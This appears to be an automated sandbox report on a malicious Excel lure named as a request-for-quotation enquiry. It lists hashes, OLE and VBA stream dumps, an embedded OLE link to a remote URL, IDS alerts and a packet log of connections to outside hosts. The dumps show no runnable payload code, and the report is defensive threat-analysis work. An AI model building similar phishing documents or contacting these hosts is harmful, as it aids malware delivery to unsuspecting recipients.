                            SHA-512:BE2C202040245F25CB24C7F7B44A69F0000A95984236C3AE671443C56A7E1AE05BD7ACED71979ADF1159490770A767D25F581E76540C9C653441558BAECC0C89
                            Malicious:true
                            Preview:.user ..t.i.n.a. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                            Static File Info

                            General

                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Mar 24 01:30:09 2025, Security: 1
                            Entropy (8bit):7.9787592112424885
                            TrID:
                            • Microsoft Excel sheet (30009/1) 47.99%
                            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                            File name:ENQUIRY - RFQ 674441-76450.xla.xlsx
                            File size:1'304'064 bytes
                            MD5:728def92ce2cf1e59208b5747c4f29e8
                            SHA1:b4a65a2275e8b1dbb37bb1ad7949f6f456da1773
                            SHA256:e822eabb8cd2fdd493bda865b2deebc1d4e272da9f1b17b8729de2289a31da3e
                            SHA512:9c4201cf59f67abaadcf6cc937eb8348220b0a67339cb39fa349550897db8532eb795a8c249e1a3ce81d5454558c9cd0fe64876c86a0296aebff929af9fcaedb
                            SSDEEP:24576:JKWmHNSyAZ0F17OhsB4GMBXZ1SMP8NzzHLzevHOGMUxyPEu:JM7oWypulzHLzevuGmPEu
                            TLSH:1555230BBAC2DB42E8A755B4DD939D6522083F016B0AC55733847B6A773D230D7A3B1E
                            File Content Preview:........................>...................................(...........................................................k.......m.......o.......q.......s......................................................................................................

                            File Icon

                            Icon Hash:35e58a8c0c8a85b9

                            Static OLE Info

                            General

                            Document Type:OLE
                            Number of OLE Files:1

                            OLE File "ENQUIRY - RFQ 674441-76450.xla.xlsx"

                            Indicators
                            Has Summary Info:
                            Application Name:Microsoft Excel
                            Encrypted Document:True
                            Contains Word Document Stream:False
                            Contains Workbook/Book Stream:True
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:False
                            Flash Objects Count:0
                            Contains VBA Macros:True
                            Summary
                            Code Page:1252
                            Author:
                            Last Saved By:
                            Create Time:2006-09-16 00:00:00
                            Last Saved Time:2025-03-24 01:30:09
                            Creating Application:Microsoft Excel
                            Security:1
                            Document Summary
                            Document Code Page:1252
                            Thumbnail Scaling Desired:False
                            Contains Dirty Links:False
                            Shared Document:False
                            Changed Hyperlinks:False
                            Application Version:786432
                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                            VBA File Name:Sheet1.cls
                            Stream Size:977
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 af c3 70 e0 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            VBA Code
                            Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                            VBA File Name:Sheet2.cls
                            Stream Size:977
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 af c3 4f d1 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            VBA Code
                            Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                            VBA File Name:Sheet3.cls
                            Stream Size:977
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 af c3 fc 53 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            VBA Code
                            Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                            VBA File Name:ThisWorkbook.cls
                            Stream Size:985
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0 .
                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 af c3 cc c0 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            VBA Code
                            Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                            General
                            Stream Path:\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.25248375192737
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:\x5DocumentSummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:244
                            Entropy:2.889430592781307
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                            General
                            Stream Path:\x5SummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:200
                            Entropy:3.3020681057018666
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . G \\ . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                            General
                            Stream Path:MBD00356DE0/\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:99
                            Entropy:3.631242196770981
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:MBD00356DE0/Package
                            CLSID:
                            File Type:Microsoft Excel 2007+
                            Stream Size:668928
                            Entropy:7.977799713326433
                            Base64 Encoded:True
                            Data ASCII:P K . . . . . . . . . . ! . . N . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 dd 84 4e d1 e5 01 00 00 16 08 00 00 13 00 cc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 c8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:MBD00356DE1/\x1Ole
                            CLSID:
                            File Type:data
                            Stream Size:788
                            Entropy:4.903728938701706
                            Base64 Encoded:False
                            Data ASCII:. . . . . a . . . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . t . . . e . m . o . b . i . l . i . t . y . . . e . n . e . r . g . y . / . 3 . y . R . D . Y . q . ? . & . b . a . l . a . n . c . e . = . t . e . s . t . e . d . & . c . l . e . a . n . e . r . . . & . F . . J T E l i E . . . O p . . . . > . 9 . . [ . . i . h . < ) c . = . A . F $ . k . l . . # 2 K ! . / k @ . . . . . . . . . . . . . . . . . . . V . 7 . v . G . E . 9 . 6 . H . j . T . L . 9 . g . D . b . I . c
                            Data Raw:01 00 00 02 b9 13 61 0c b8 a5 be 14 00 00 00 00 00 00 00 00 00 00 00 00 de 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b da 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 74 00 2e 00 65 00 6d 00 6f 00 62 00 69 00 6c 00 69 00 74 00 79 00 2e 00 65 00 6e 00 65 00 72 00 67 00 79 00 2f 00 33 00 79 00 52 00 44 00 59 00 71 00 3f 00 26 00 62 00 61 00 6c 00 61 00 6e 00
                            General
                            Stream Path:Workbook
                            CLSID:
                            File Type:Applesoft BASIC program data, first line number 16
                            Stream Size:610734
                            Entropy:7.999428911070794
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . z . w O O ^ ! . E Z . l O X 1 < - E . o c r . t 4 . . . . . . . . . . N . . . \\ . p . . c - U Y Y v 7 D e 4 . J r | * N p 9 7 l . W 9 ~ 2 O _ T . m G ( x . . . $ w k " r . x B Q ` Y ~ . q . f P r . g I . N G > ( 9 h B . . . \\ a . . . ~ . . . = . . . . o O G . . . . . m . \\ J 2 ? . . . . . . . . ; p . . . . . . . . . D . . . . o . . . = . . . * u Q . 1 + Y i 6 ; I @ . . . . . . . P " . . . . = . . . . f . . . + . . . . | 1 . . . . Z * . ' , F S ~ . . . ^
                            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 7a 8c 95 0b ce c1 77 4f d3 4f 5e 8e 21 e8 8a a0 45 e0 ca 5a 06 6c d0 4f 58 31 c8 3c 2d ac 98 45 d2 92 6f 63 cf 72 be 96 84 e9 18 9f c7 74 34 f5 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 cc 4e e2 00 00 00 5c 00 70 00 bf 93 d6 18 63 2d af b9 55 59 59 76 ff 80 37 f5 ec 44 65 c6 34 19 c5 e7 4a de
                            General
                            Stream Path:_VBA_PROJECT_CUR/PROJECT
                            CLSID:
                            File Type:ASCII text, with CRLF line terminators
                            Stream Size:531
                            Entropy:5.226461353032341
                            Base64 Encoded:True
                            Data ASCII:I D = " { B 6 A C 0 8 C 9 - 0 9 D E - 4 E 0 8 - A 4 5 A - F 0 7 7 3 E 1 E 5 3 5 4 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 E 9 C 7 3 F 5 9 3 0 D 0 B 1 1 0
                            Data Raw:49 44 3d 22 7b 42 36 41 43 30 38 43 39 2d 30 39 44 45 2d 34 45 30 38 2d 41 34 35 41 2d 46 30 37 37 33 45 31 45 35 33 35 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                            General
                            Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                            CLSID:
                            File Type:data
                            Stream Size:104
                            Entropy:3.0488640812019017
                            Base64 Encoded:False
                            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                            Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                            CLSID:
                            File Type:data
                            Stream Size:2644
                            Entropy:4.000746481629967
                            Base64 Encoded:False
                            Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                            Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/dir
                            CLSID:
                            File Type:data
                            Stream Size:553
                            Entropy:6.371982954211479
                            Base64 Encoded:True
                            Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . 7 C i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                            Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 37 43 f8 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                            Network Behavior

                            Download Network PCAP: filteredfull

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2025-03-24T09:33:31.711934+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.94970113.107.246.40443TCP
                            2025-03-24T09:33:37.900489+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.94970313.107.246.40443TCP
                            2025-03-24T09:33:37.900636+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.94970213.107.246.40443TCP

                            Network Port Distribution

                            • Total Packets: 247
                            • 443 (HTTPS)
                            • 80 (HTTP)
                            • 53 (DNS)
                            TimestampSource PortDest PortSource IPDest IP
                            Mar 24, 2025 09:32:27.146379948 CET4968780192.168.2.943.152.182.96
                            Mar 24, 2025 09:32:27.244469881 CET804968743.152.182.96192.168.2.9
                            Mar 24, 2025 09:32:27.244612932 CET4968780192.168.2.943.152.182.96
                            Mar 24, 2025 09:32:27.248343945 CET4968780192.168.2.943.152.182.96
                            Mar 24, 2025 09:32:27.349298000 CET804968743.152.182.96192.168.2.9
                            Mar 24, 2025 09:32:27.350023985 CET804968743.152.182.96192.168.2.9
                            Mar 24, 2025 09:32:27.350150108 CET804968743.152.182.96192.168.2.9
                            Mar 24, 2025 09:32:27.350348949 CET4968780192.168.2.943.152.182.96
                            Mar 24, 2025 09:32:27.407335997 CET804968743.152.182.96192.168.2.9
                            Mar 24, 2025 09:32:27.407387018 CET4968780192.168.2.943.152.182.96
                            Mar 24, 2025 09:32:27.459073067 CET4968780192.168.2.943.152.182.96
                            Mar 24, 2025 09:32:27.561091900 CET804968743.152.182.96192.168.2.9
                            Mar 24, 2025 09:32:28.475783110 CET4968980192.168.2.943.152.182.96
                            Mar 24, 2025 09:32:28.575062037 CET804968943.152.182.96192.168.2.9
                            Mar 24, 2025 09:32:28.575146914 CET4968980192.168.2.943.152.182.96
                            Mar 24, 2025 09:32:28.575257063 CET4968980192.168.2.943.152.182.96
                            Mar 24, 2025 09:32:28.673719883 CET804968943.152.182.96192.168.2.9
                            Mar 24, 2025 09:32:28.674036980 CET804968943.152.182.96192.168.2.9
                            Mar 24, 2025 09:32:28.674077988 CET804968943.152.182.96192.168.2.9
                            Mar 24, 2025 09:32:28.674117088 CET4968980192.168.2.943.152.182.96
                            Mar 24, 2025 09:32:28.674209118 CET804968943.152.182.96192.168.2.9
                            Mar 24, 2025 09:32:28.674576044 CET804968943.152.182.96192.168.2.9
                            Mar 24, 2025 09:32:28.674591064 CET804968943.152.182.96192.168.2.9
                            Mar 24, 2025 09:32:28.674618959 CET4968980192.168.2.943.152.182.96
                            Mar 24, 2025 09:32:28.674644947 CET804968943.152.182.96192.168.2.9
                            Mar 24, 2025 09:32:28.674658060 CET804968943.152.182.96192.168.2.9
                            Mar 24, 2025 09:32:28.674665928 CET804968943.152.182.96192.168.2.9
                            Mar 24, 2025 09:32:28.674685955 CET4968980192.168.2.943.152.182.96
                            Mar 24, 2025 09:32:28.674736977 CET4968980192.168.2.943.152.182.96
                            Mar 24, 2025 09:32:28.727093935 CET804968943.152.182.96192.168.2.9
                            Mar 24, 2025 09:32:28.727139950 CET4968980192.168.2.943.152.182.96
                            Mar 24, 2025 09:32:28.776071072 CET804968943.152.182.96192.168.2.9
                            Mar 24, 2025 09:32:28.776120901 CET4968980192.168.2.943.152.182.96
                            Mar 24, 2025 09:33:17.959242105 CET49699443192.168.2.9162.19.137.157
                            Mar 24, 2025 09:33:17.959304094 CET44349699162.19.137.157192.168.2.9
                            Mar 24, 2025 09:33:17.959391117 CET49699443192.168.2.9162.19.137.157
                            Mar 24, 2025 09:33:17.959619045 CET49699443192.168.2.9162.19.137.157
                            Mar 24, 2025 09:33:17.959635019 CET44349699162.19.137.157192.168.2.9
                            Mar 24, 2025 09:33:18.341684103 CET44349699162.19.137.157192.168.2.9
                            Mar 24, 2025 09:33:18.341780901 CET49699443192.168.2.9162.19.137.157
                            Mar 24, 2025 09:33:18.347543001 CET49699443192.168.2.9162.19.137.157
                            Mar 24, 2025 09:33:18.347558022 CET44349699162.19.137.157192.168.2.9
                            Mar 24, 2025 09:33:18.347896099 CET44349699162.19.137.157192.168.2.9
                            Mar 24, 2025 09:33:18.347971916 CET49699443192.168.2.9162.19.137.157
                            Mar 24, 2025 09:33:18.349246979 CET49699443192.168.2.9162.19.137.157
                            Mar 24, 2025 09:33:18.396325111 CET44349699162.19.137.157192.168.2.9
                            Mar 24, 2025 09:33:18.718049049 CET44349699162.19.137.157192.168.2.9
                            Mar 24, 2025 09:33:18.718128920 CET44349699162.19.137.157192.168.2.9
                            Mar 24, 2025 09:33:18.718154907 CET49699443192.168.2.9162.19.137.157
                            Mar 24, 2025 09:33:18.718205929 CET49699443192.168.2.9162.19.137.157
                            Mar 24, 2025 09:33:18.746886969 CET49699443192.168.2.9162.19.137.157
                            Mar 24, 2025 09:33:18.746948957 CET44349699162.19.137.157192.168.2.9
                            Mar 24, 2025 09:33:18.750401974 CET4970080192.168.2.9217.154.55.185
                            Mar 24, 2025 09:33:18.919512987 CET8049700217.154.55.185192.168.2.9
                            Mar 24, 2025 09:33:18.919586897 CET4970080192.168.2.9217.154.55.185
                            Mar 24, 2025 09:33:18.919820070 CET4970080192.168.2.9217.154.55.185
                            Mar 24, 2025 09:33:19.090862989 CET8049700217.154.55.185192.168.2.9
                            Mar 24, 2025 09:33:19.090887070 CET8049700217.154.55.185192.168.2.9
                            Mar 24, 2025 09:33:19.090900898 CET8049700217.154.55.185192.168.2.9
                            Mar 24, 2025 09:33:19.090913057 CET8049700217.154.55.185192.168.2.9
                            Mar 24, 2025 09:33:19.090920925 CET4970080192.168.2.9217.154.55.185
                            Mar 24, 2025 09:33:19.090928078 CET8049700217.154.55.185192.168.2.9
                            Mar 24, 2025 09:33:19.090948105 CET4970080192.168.2.9217.154.55.185
                            Mar 24, 2025 09:33:19.091002941 CET4970080192.168.2.9217.154.55.185
                            Mar 24, 2025 09:33:24.120640993 CET8049700217.154.55.185192.168.2.9
                            Mar 24, 2025 09:33:24.120714903 CET4970080192.168.2.9217.154.55.185
                            Mar 24, 2025 09:33:28.678514957 CET804968943.152.182.96192.168.2.9
                            Mar 24, 2025 09:33:28.678576946 CET4968980192.168.2.943.152.182.96
                            Mar 24, 2025 09:33:28.688265085 CET4968980192.168.2.943.152.182.96
                            Mar 24, 2025 09:33:28.789479971 CET804968943.152.182.96192.168.2.9
                            Mar 24, 2025 09:33:31.392121077 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:31.392162085 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:31.392222881 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:31.392659903 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:31.392672062 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:31.711863995 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:31.711934090 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:31.713781118 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:31.713789940 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:31.714092016 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:31.715357065 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:31.760324955 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.041899920 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.041937113 CET4434970113.107.246.40192.168.2.9
